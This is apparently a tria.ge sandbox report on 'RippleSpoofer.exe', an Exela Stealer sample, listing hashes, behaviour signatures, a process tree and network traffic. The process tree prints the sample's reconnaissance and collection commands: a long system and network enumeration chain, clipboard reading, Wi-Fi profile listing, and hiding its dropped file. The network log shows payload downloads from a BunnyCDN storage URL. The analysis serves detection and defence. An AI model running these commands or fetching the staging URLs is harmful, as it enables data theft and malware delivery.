Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    74s
  • max time network
    76s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/11/2024, 13:52 UTC

General

  • Target

    RippleSpoofer.exe

  • Size

    15.6MB

  • MD5

    76ed914a265f60ff93751afe02cf35a4

  • SHA1

    4f8ea583e5999faaec38be4c66ff4849fcf715c6

  • SHA256

    51bd245f8cb24c624674cd2bebcad4152d83273dab4d1ee7d982e74a0548890b

  • SHA512

    83135f8b040b68cafb896c4624bd66be1ae98857907b9817701d46952d4be9aaf7ad1ab3754995363bb5192fa2c669c26f526cafc6c487b061c2edcceebde6ac

  • SSDEEP

    393216:QAiUmWQEnjaa4cqmAa4ICSSF1a0HPRV8gtFlSiZh5ZlZ:bhnGhMAXSmHXFA+

Malware Config

Signatures

  • Exela Stealer

    Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.

  • Exelastealer family
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 33 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • System Network Connections Discovery 1 TTPs 1 IoCs

    Attempt to get a listing of network connections.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RippleSpoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\RippleSpoofer.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3956
    • C:\Windows\SYSTEM32\taskkill.exe
      "taskkill" /F /IM explorer.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:3608
    • C:\Users\Admin\AppData\Local\Temp\TempAppFiles\mac.exe
      "C:\Users\Admin\AppData\Local\Temp\TempAppFiles\mac.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:5008
      • C:\Users\Admin\AppData\Local\Temp\TempAppFiles\mac.exe
        "C:\Users\Admin\AppData\Local\Temp\TempAppFiles\mac.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4036
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "ver"
          4⤵
            PID:2444
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3656
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic csproduct get uuid
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1328
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3116
            • C:\Windows\system32\tasklist.exe
              tasklist
              5⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:1324
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
            4⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:3324
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
              5⤵
              • Views/modifies file attributes
              PID:4752
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3820
            • C:\Windows\system32\tasklist.exe
              tasklist
              5⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:2216
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2188
            • C:\Windows\system32\cmd.exe
              cmd.exe /c chcp
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4192
              • C:\Windows\system32\chcp.com
                chcp
                6⤵
                  PID:5036
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3264
              • C:\Windows\system32\cmd.exe
                cmd.exe /c chcp
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4672
                • C:\Windows\system32\chcp.com
                  chcp
                  6⤵
                    PID:2140
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2780
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  5⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4000
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                4⤵
                • Clipboard Data
                • Suspicious use of WriteProcessMemory
                PID:4252
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe Get-Clipboard
                  5⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4020
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                4⤵
                • System Network Configuration Discovery: Wi-Fi Discovery
                • Suspicious use of WriteProcessMemory
                PID:4808
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profiles
                  5⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:1416
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                4⤵
                • Network Service Discovery
                • Suspicious use of WriteProcessMemory
                PID:4900
                • C:\Windows\system32\systeminfo.exe
                  systeminfo
                  5⤵
                  • Gathers system information
                  PID:4296
                • C:\Windows\system32\HOSTNAME.EXE
                  hostname
                  5⤵
                    PID:1844
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic logicaldisk get caption,description,providername
                    5⤵
                    • Collects information from the system
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4736
                  • C:\Windows\system32\net.exe
                    net user
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1252
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 user
                      6⤵
                        PID:3796
                    • C:\Windows\system32\query.exe
                      query user
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4688
                      • C:\Windows\system32\quser.exe
                        "C:\Windows\system32\quser.exe"
                        6⤵
                          PID:532
                      • C:\Windows\system32\net.exe
                        net localgroup
                        5⤵
                          PID:4336
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 localgroup
                            6⤵
                              PID:2316
                          • C:\Windows\system32\net.exe
                            net localgroup administrators
                            5⤵
                              PID:2532
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 localgroup administrators
                                6⤵
                                  PID:1444
                              • C:\Windows\system32\net.exe
                                net user guest
                                5⤵
                                  PID:4584
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 user guest
                                    6⤵
                                      PID:2592
                                  • C:\Windows\system32\net.exe
                                    net user administrator
                                    5⤵
                                      PID:2232
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 user administrator
                                        6⤵
                                          PID:4676
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic startup get caption,command
                                        5⤵
                                          PID:1560
                                        • C:\Windows\system32\tasklist.exe
                                          tasklist /svc
                                          5⤵
                                          • Enumerates processes with tasklist
                                          PID:3120
                                        • C:\Windows\system32\ipconfig.exe
                                          ipconfig /all
                                          5⤵
                                          • Gathers network information
                                          PID:2396
                                        • C:\Windows\system32\ROUTE.EXE
                                          route print
                                          5⤵
                                            PID:2444
                                          • C:\Windows\system32\ARP.EXE
                                            arp -a
                                            5⤵
                                            • Network Service Discovery
                                            PID:2024
                                          • C:\Windows\system32\NETSTAT.EXE
                                            netstat -ano
                                            5⤵
                                            • System Network Connections Discovery
                                            • Gathers network information
                                            PID:5028
                                          • C:\Windows\system32\sc.exe
                                            sc query type= service state= all
                                            5⤵
                                            • Launches sc.exe
                                            PID:2328
                                          • C:\Windows\system32\netsh.exe
                                            netsh firewall show state
                                            5⤵
                                            • Modifies Windows Firewall
                                            • Event Triggered Execution: Netsh Helper DLL
                                            PID:3132
                                          • C:\Windows\system32\netsh.exe
                                            netsh firewall show config
                                            5⤵
                                            • Modifies Windows Firewall
                                            • Event Triggered Execution: Netsh Helper DLL
                                            PID:3752
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                          4⤵
                                            PID:1424
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic csproduct get uuid
                                              5⤵
                                                PID:3284
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                              4⤵
                                                PID:4080
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic csproduct get uuid
                                                  5⤵
                                                    PID:1564
                                          • C:\Windows\system32\AUDIODG.EXE
                                            C:\Windows\system32\AUDIODG.EXE 0x300 0x41c
                                            1⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:732

                                          Network

                                          • flag-us
                                            DNS
                                            8.8.8.8.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            8.8.8.8.in-addr.arpa
                                            IN PTR
                                            Response
                                            8.8.8.8.in-addr.arpa
                                            IN PTR
                                            dnsgoogle
                                          • flag-us
                                            DNS
                                            8.8.8.8.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            8.8.8.8.in-addr.arpa
                                            IN PTR
                                          • flag-us
                                            DNS
                                            28.118.140.52.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            28.118.140.52.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            28.118.140.52.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            28.118.140.52.in-addr.arpa
                                            IN PTR
                                          • flag-us
                                            DNS
                                            17.114.16.2.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            17.114.16.2.in-addr.arpa
                                            IN PTR
                                            Response
                                            17.114.16.2.in-addr.arpa
                                            IN PTR
                                            a2-16-114-17deploystaticakamaitechnologiescom
                                          • flag-us
                                            DNS
                                            71.159.190.20.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            71.159.190.20.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            www.dropbox.com
                                            RippleSpoofer.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            www.dropbox.com
                                            IN A
                                            Response
                                            www.dropbox.com
                                            IN CNAME
                                            www-env.dropbox-dns.com
                                            www-env.dropbox-dns.com
                                            IN A
                                            162.125.64.18
                                          • flag-gb
                                            GET
                                            https://www.dropbox.com/scl/fi/lymnqnkmq1u7j38npvuzz/version.json?rlkey=lmojv15nkp9kk5orfdpm4m5bs&st=usd8hokl&dl=1
                                            RippleSpoofer.exe
                                            Remote address:
                                            162.125.64.18:443
                                            Request
                                            GET /scl/fi/lymnqnkmq1u7j38npvuzz/version.json?rlkey=lmojv15nkp9kk5orfdpm4m5bs&st=usd8hokl&dl=1 HTTP/1.1
                                            Host: www.dropbox.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 302 Found
                                            Content-Security-Policy: child-src https://www.dropbox.com/static/serviceworker/ blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; frame-ancestors 'self' https://*.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; img-src https://* data: blob:
                                            Content-Type: text/html; charset=utf-8
                                            Location: https://uc8560faba406d62e3d1cdb73d56.dl.dropboxusercontent.com/cd/0/get/Ce2uqHL3tleZfea7IYsBUu-jSW6QBEhYPFWiwTis5uMughwlu5VEFnEfPMRECjxSg0JeHJRDFQO0ZZlRXNeTacal2pmQqiSioKmEFKBfEFVtrL8GXIN76fc3p2fYI-HgDHU1r_wZ5UP-UEg_YUIaz1C1/file?dl=1#
                                            Pragma: no-cache
                                            Referrer-Policy: strict-origin-when-cross-origin
                                            Set-Cookie: gvc=Njg3Mzk5MTk4ODUzNzc1OTc2NzM5NjczODI2MTE4NDkwNzUxNjI=; Path=/; Expires=Wed, 21 Nov 2029 13:53:23 GMT; HttpOnly; Secure; SameSite=None
                                            Set-Cookie: t=MVePIX8WxAMKzBenz09Q0mix; Path=/; Domain=dropbox.com; Expires=Sat, 22 Nov 2025 13:53:23 GMT; HttpOnly; Secure; SameSite=None
                                            Set-Cookie: __Host-js_csrf=MVePIX8WxAMKzBenz09Q0mix; Path=/; Expires=Sat, 22 Nov 2025 13:53:23 GMT; Secure; SameSite=None
                                            Set-Cookie: __Host-ss=gt3-KSlGW0; Path=/; Expires=Sat, 22 Nov 2025 13:53:23 GMT; HttpOnly; Secure; SameSite=Strict
                                            Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Wed, 21 Nov 2029 13:53:23 GMT
                                            X-Content-Type-Options: nosniff
                                            X-Permitted-Cross-Domain-Policies: none
                                            X-Robots-Tag: noindex, nofollow, noimageindex
                                            X-Xss-Protection: 1; mode=block
                                            Content-Length: 17
                                            Date: Fri, 22 Nov 2024 13:53:24 GMT
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                            Server: envoy
                                            Cache-Control: no-cache, no-store
                                            X-Dropbox-Response-Origin: far_remote
                                            X-Dropbox-Request-Id: 6df245c1514b4d759094636ba50d4c65
                                          • flag-us
                                            DNS
                                            uc8560faba406d62e3d1cdb73d56.dl.dropboxusercontent.com
                                            RippleSpoofer.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            uc8560faba406d62e3d1cdb73d56.dl.dropboxusercontent.com
                                            IN A
                                            Response
                                            uc8560faba406d62e3d1cdb73d56.dl.dropboxusercontent.com
                                            IN CNAME
                                            edge-block-www-env.dropbox-dns.com
                                            edge-block-www-env.dropbox-dns.com
                                            IN A
                                            162.125.64.15
                                          • flag-gb
                                            GET
                                            https://uc8560faba406d62e3d1cdb73d56.dl.dropboxusercontent.com/cd/0/get/Ce2uqHL3tleZfea7IYsBUu-jSW6QBEhYPFWiwTis5uMughwlu5VEFnEfPMRECjxSg0JeHJRDFQO0ZZlRXNeTacal2pmQqiSioKmEFKBfEFVtrL8GXIN76fc3p2fYI-HgDHU1r_wZ5UP-UEg_YUIaz1C1/file?dl=1
                                            RippleSpoofer.exe
                                            Remote address:
                                            162.125.64.15:443
                                            Request
                                            GET /cd/0/get/Ce2uqHL3tleZfea7IYsBUu-jSW6QBEhYPFWiwTis5uMughwlu5VEFnEfPMRECjxSg0JeHJRDFQO0ZZlRXNeTacal2pmQqiSioKmEFKBfEFVtrL8GXIN76fc3p2fYI-HgDHU1r_wZ5UP-UEg_YUIaz1C1/file?dl=1 HTTP/1.1
                                            Host: uc8560faba406d62e3d1cdb73d56.dl.dropboxusercontent.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Content-Type: application/binary
                                            Accept-Ranges: bytes
                                            Cache-Control: max-age=60
                                            Content-Disposition: attachment; filename="version.json"; filename*=UTF-8''version.json
                                            Content-Security-Policy: sandbox
                                            Etag: 1725398947624654d
                                            Pragma: public
                                            Referrer-Policy: no-referrer
                                            Vary: Origin
                                            X-Content-Security-Policy: sandbox
                                            X-Content-Type-Options: nosniff
                                            X-Robots-Tag: noindex, nofollow, noimageindex
                                            X-Server-Response-Time: 136
                                            X-Webkit-Csp: sandbox
                                            Date: Fri, 22 Nov 2024 13:53:24 GMT
                                            Server: envoy
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Content-Length: 26
                                            X-Dropbox-Response-Origin: far_remote
                                            X-Dropbox-Request-Id: 75455b0c3caf49189281eeb2cfe3fa22
                                          • flag-us
                                            DNS
                                            18.64.125.162.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            18.64.125.162.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            15.64.125.162.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            15.64.125.162.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            104.219.191.52.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            104.219.191.52.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            200.163.202.172.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            200.163.202.172.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            198.187.3.20.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            198.187.3.20.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            106.209.201.84.in-addr.arpa
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            106.209.201.84.in-addr.arpa
                                            IN PTR
                                            Response
                                          • flag-us
                                            DNS
                                            storage.bunnycdn.com
                                            RippleSpoofer.exe
                                            Remote address:
                                            8.8.8.8:53
                                            Request
                                            storage.bunnycdn.com
                                            IN A
                                            Response
                                            storage.bunnycdn.com
                                            IN A
                                            109.61.89.55
                                            storage.bunnycdn.com
                                            IN A
                                            109.61.89.53
                                            storage.bunnycdn.com
                                            IN A
                                            109.61.89.54
                                            storage.bunnycdn.com
                                            IN A
                                            185.59.220.194
                                          • flag-de
                                            GET
                                            https://storage.bunnycdn.com/spongebob1/amigendrv64.sys?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                            RippleSpoofer.exe
                                            Remote address:
                                            109.61.89.55:443
                                            Request
                                            GET /spongebob1/amigendrv64.sys?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                            User-Agent: Mozilla/5.0
                                            Host: storage.bunnycdn.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Fri, 22 Nov 2024 13:54:08 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 37040
                                            Connection: keep-alive
                                            Content-Disposition: attachment; filename=amigendrv64.sys
                                            Pragma: no-cache
                                            Last-Modified: Fri, 30 Aug 2024 18:45:16 GMT
                                            ETag: "66d2133c-90b0"
                                            Accept-Ranges: bytes
                                          • flag-de
                                            GET
                                            https://storage.bunnycdn.com/spongebob1/amifldrv64.sys?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                            RippleSpoofer.exe
                                            Remote address:
                                            109.61.89.55:443
                                            Request
                                            GET /spongebob1/amifldrv64.sys?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                            User-Agent: Mozilla/5.0
                                            Host: storage.bunnycdn.com
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Fri, 22 Nov 2024 13:54:08 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 19432
                                            Connection: keep-alive
                                            Content-Disposition: attachment; filename=amifldrv64.sys
                                            Pragma: no-cache
                                            Last-Modified: Fri, 30 Aug 2024 18:45:16 GMT
                                            ETag: "66d2133c-4be8"
                                            Accept-Ranges: bytes
                                          • flag-de
                                            GET
                                            https://storage.bunnycdn.com/spongebob1/volumeid.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                            RippleSpoofer.exe
                                            Remote address:
                                            109.61.89.55:443
                                            Request
                                            GET /spongebob1/volumeid.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                            User-Agent: Mozilla/5.0
                                            Host: storage.bunnycdn.com
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Fri, 22 Nov 2024 13:54:09 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 233640
                                            Connection: keep-alive
                                            Content-Disposition: attachment; filename=volumeid.EXE
                                            Pragma: no-cache
                                            Last-Modified: Fri, 30 Aug 2024 18:45:15 GMT
                                            ETag: "66d2133b-390a8"
                                            Accept-Ranges: bytes
                                          • flag-de
                                            GET
                                            https://storage.bunnycdn.com/spongebob1/volumeid64.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                            RippleSpoofer.exe
                                            Remote address:
                                            109.61.89.55:443
                                            Request
                                            GET /spongebob1/volumeid64.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                            User-Agent: Mozilla/5.0
                                            Host: storage.bunnycdn.com
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Fri, 22 Nov 2024 13:54:09 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 169648
                                            Connection: keep-alive
                                            Content-Disposition: attachment; filename=volumeid64.EXE
                                            Pragma: no-cache
                                            Last-Modified: Fri, 30 Aug 2024 18:45:16 GMT
                                            ETag: "66d2133c-296b0"
                                            Accept-Ranges: bytes
                                          • flag-de
                                            GET
                                            https://storage.bunnycdn.com/spongebob1/randomizer.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                            RippleSpoofer.exe
                                            Remote address:
                                            109.61.89.55:443
                                            Request
                                            GET /spongebob1/randomizer.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                            User-Agent: Mozilla/5.0
                                            Host: storage.bunnycdn.com
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Fri, 22 Nov 2024 13:54:09 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 5010465
                                            Connection: keep-alive
                                            Content-Disposition: attachment; filename=randomizer.EXE
                                            Pragma: no-cache
                                            Last-Modified: Mon, 02 Sep 2024 15:39:33 GMT
                                            ETag: "66d5dc35-4c7421"
                                            Accept-Ranges: bytes
                                          • flag-de
                                            GET
                                            https://storage.bunnycdn.com/spongebob1/AMIDEWINx64.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                            RippleSpoofer.exe
                                            Remote address:
                                            109.61.89.55:443
                                            Request
                                            GET /spongebob1/AMIDEWINx64.EXE?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                            User-Agent: Mozilla/5.0
                                            Host: storage.bunnycdn.com
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Fri, 22 Nov 2024 13:54:10 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 388720
                                            Connection: keep-alive
                                            Content-Disposition: attachment; filename=AMIDEWINx64.EXE
                                            Pragma: no-cache
                                            Last-Modified: Fri, 30 Aug 2024 18:45:16 GMT
                                            ETag: "66d2133c-5ee70"
                                            Accept-Ranges: bytes
                                          • flag-de
                                            GET
                                            https://storage.bunnycdn.com/spongebob1/spoof.bat?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                            RippleSpoofer.exe
                                            Remote address:
                                            109.61.89.55:443
                                            Request
                                            GET /spongebob1/spoof.bat?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download HTTP/1.1
                                            User-Agent: Mozilla/5.0
                                            Host: storage.bunnycdn.com
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Fri, 22 Nov 2024 13:54:10 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 1908
                                            Connection: keep-alive
                                            Content-Disposition: attachment; filename=spoof.bat
                                            Pragma: no-cache
                                            Last-Modified: Fri, 30 Aug 2024 18:45:14 GMT
                                            ETag: "66d2133a-774"
                                            Accept-Ranges: bytes
                                          • flag-de
                                            GET
                                            https://storage.bunnycdn.com/spongebob1/21902902190121290mc.exe?accessKey=e2eae769-df63-4027-a4f9577a583c-b676-4439&download
                                            RippleSpoofer.exe
                                            Remote address:
                                            109.61.89.55:443
